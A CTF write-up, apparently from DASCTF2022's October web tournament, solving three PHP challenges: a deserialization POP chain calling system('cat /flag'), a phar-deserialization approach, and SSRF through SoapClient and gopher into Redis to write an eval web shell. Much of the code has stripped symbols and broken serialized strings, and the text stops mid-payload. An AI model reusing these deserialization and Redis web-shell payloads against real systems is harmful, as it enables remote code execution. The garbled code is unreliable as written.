Title: DASCTF2022 —— October Tournament Web Part Writeup

EasyPOP

The problem environment is php 7.4, so you can directly change all attribute types to public

The starting point is the __destruct() of the sorry class, which is called by echo $this-hint to the __toString() method of the show class, and then jump to the __call() of the secret_code class by executing $this-ctf-show(), and then to the show() method, access the non-existent attribute in the show() method, jump to the __get() of the sorry class, and finally jump to the __invoke() of the fine class through $name()

The pop chain is constructed as follows

?php

class fine

{

public $cmd;

public $content;

}

class show

{

public $ctf;

public $time;

}

class sorry

{

public $name;

public $password;

public $hint;

public $key;

}

class secret_code

{

public $code;

}

$e=new fine();

$e-cmd='system';

$e-content='cat /flag';

$d=new sorry();

$d-key=$e;

$c=new secret_code();

$c-code=$d;

$b=new Show();

$b-ctf=$c;

$a=new sorry();

$a-name='123';

$a-password='123';

$a-hint=$b;

echo serialize($a);

Finally change the number and bypass __wakeup

http://f9eac3ed-9425-4fe7-a009-aad41f9db212.node4.buuoj.cn:81/?pop=O:5:'sorry':4:{s:4:'name';s:'123';s:8:'password';s:'hint';O:4:'show':2:{s:'ctf';O:11:'sec ret_code':1:{s:4:'code';O:5:'sorry':4:{s:4:'name';N;s:8:'password';N;s:4:'hint';N;s:'key';O:4:'fine':{s:'cmd';s:6:'system';s:7:'content';s:93:'cat /flag';}}}s:4:'time';N;}s:3:'key';N;}

hade_waibo

cancan need to read any file

http://745b93ee-b378-4803-b84e-52f9e7b78d2a.node4.buuoj.cn:81/file.php?m=showfilename=file.php

file.php

..

?php

error_reporting(0);

session_start();

include 'class.php';

if($_SESSION['isLogin'] !==true){

die('scriptalert('Login for Thanks.');location.href='index.php'/script');

}

$form='

form action='file.php?m=upload' method='post' enctype='multipart/form-data'

input type='file' name='file'

button class='mini ui button' font style='vertical-align: inherit;'font style='vertical-align: inherit;'

submit

/font/font/button

/form';

$file=new file();

switch ($_GET['m']) {

case 'upload':

if(empty($_FILES)){die($form);}

$type=end(explode('.', $_FILES['file']['name']));

if ($file-check($type)) {

die($file-upload($type));

}else{

die('Do you eat oil cakes');

}

break;

case 'show':

die($file-show($_GET['filename']));

break;

case 'rm':

$file-rmfile();

die('All deleted and pinched');

break;

case 'logout':

session_destroy();

die('scriptalert('Logined out');location.href='index.php'/script');

break;

default:

echo 'h2Halo! '.$_SESSION['username'].'/h2';

break;

}

?

..

class.php

‘?php

class User

{

public $username;

public function __construct($username){

$this-username=$username;

$_SESSION['isLogin']=True;

$_SESSION['username']=$username;

}

public function __wakeup(){

$cklen=strlen($_SESSION['username']);

if ($cklen !=0 and $cklen=6) {

$this-username=$_SESSION['username'];

}

}

public function __destruct(){

if ($this-username=='') {

session_destroy();

}

}

}

class File

{

#Update the blacklist to a whitelist, making it safer

public $white=array('jpg','png');

public function show($filename){

echo 'div class='ui action input'input type='text' id='filename' placeholder='Search.'button class='ui button' onclick='window.location.href=\'file.php?m=showfilename=\'+document.getElementById(\'filename\').value'Search/button/divp';

if(empty($filename)){die();}

return 'img src='data:image/png;base64,'.base64_encode(file_get_contents($filename)).'' /';

}

public function upload($type){

$filename='dasctf'.md5(time().$_FILES['file']['name']).'.$type';

move_uploaded_file($_FILES['file']['tmp_name'], 'upload/' . $filename);

return 'Upload success! Path: upload/' . $filename;

}

public function rmfile(){

system('rm -rf /var/www/html/upload/*');

}

public function check($type){

if (!in_array($type,$this-white)){

return false;

}

return true;

}

}

#Updated a malicious and interesting Test class

class Test

{

public $value;

public function __destruct(){

chdir('./upload');

$this-backdoor();

}

public function __wakeup(){

$this-value='Don't make dream.Wake up plz!';

}

public function __toString(){

$file=substr($_GET['file'],0,3);

file_put_contents($file, 'Hack by $file !');

return 'Unreachable!)';

}

public function backdoor(){

if(preg_match('/[A-Za-z0-9?$@]+/', $this-value)){

$this-value='nono~';

}

system($this-value);

}

}

The Test class can be used, the first thing I think about is phar deserialization

You can use .executing commands to bypass the regular

The idea is to upload the phar file first, and then upload a jpg, which contains the command to be executed

Note that the name of jpg should be in front of the phar, for example, the name of the phar is dasctfe4.jpg, and the name of the jpg containing the command must be dasctfc2.jpg or dasctf01.jpg (the ascii code is smaller)

However, when trying, I found that bypassing wakeup seems not good.

Then I remembered that when I was doing EasyLove questions, there was a start.sh deployment script in the root directory. Based on the description of the question, tips:flag in a file under the/directory, so I just read the start.sh directly.

Read /ghjsdk_F149_H3re_asdasfc to get flag

EasyLove

According to the redis described in the title, it is guessed that it is to getshell via ssrf + redis

$this-love=new $this-wllm($this-arsenetang,$this-l61q4cheng); This sentence is obviously to execute ssrf through a certain class.

As we all know, the redis protocol is very loose and supports the use of http to send packets, while the SoapClient class native to php can send http

Payload as follows

?php

class swpu{

public $wllm;

public $arseneng;

public $l61q4cheng;

public $love;

}

$a=new swpu();

$a-wllm='SoapClient';

$a-arsenetang=null;

$target='http://127.0.0.1:6379/';

$poc='flushall\r\nconfig set dir /var/www/html/\r\nconfig set dbfilename shell.php\r\nset xzxzxz '?=eval(\$_REQUEST[1])?'\r\nsave';

$a-l61q4cheng=array('location'=$target, 'uri'='hello\r\n'.$poc.'\r\nhello');

echo urlencode(serialize($a));

Keep stuck during the trial (normal phenomenon), and visiting shell.php also shows 404

So I guessed that redis may have authentication. I read the hint class in the question, and obtained the content of hint.php through file_get_contents().

Directly deserialize hint without echo. As a result, when I wanted to try file_get_contents()+ gopher, I read hint.php by accident.

?php

class hint{

public $hint;

}

$a=new hint();

$a-hint='gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2422%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D% 0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A';

echo serialize($a);

http://0021bfdb-5d2b-42ff-9505-49d23c4aa0e2.node4.buuoj.cn:81/?hello=O:4:'hint':1:{s:4:'hint';s:404:'go pher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2422%0D%0A%0A%0A%3C%3Fphp% 20phpinfo%28%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A% 2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A';}

Guess 20220311 is the password of redis

So the final payload is as follows

?php

class swpu{

public $wllm;

public $arseneng;

public $l61q4cheng;

public $love;

}

$a=new swpu();

$a-wllm='SoapClient';

$a-arsenetang=null;

$target='http://127.0.0.1:6379/';

$poc='auth 20220311\r\nflushall\r\nconfig set dir /var/www/html/\r\nconfig set dbfilename shell.php\r\nset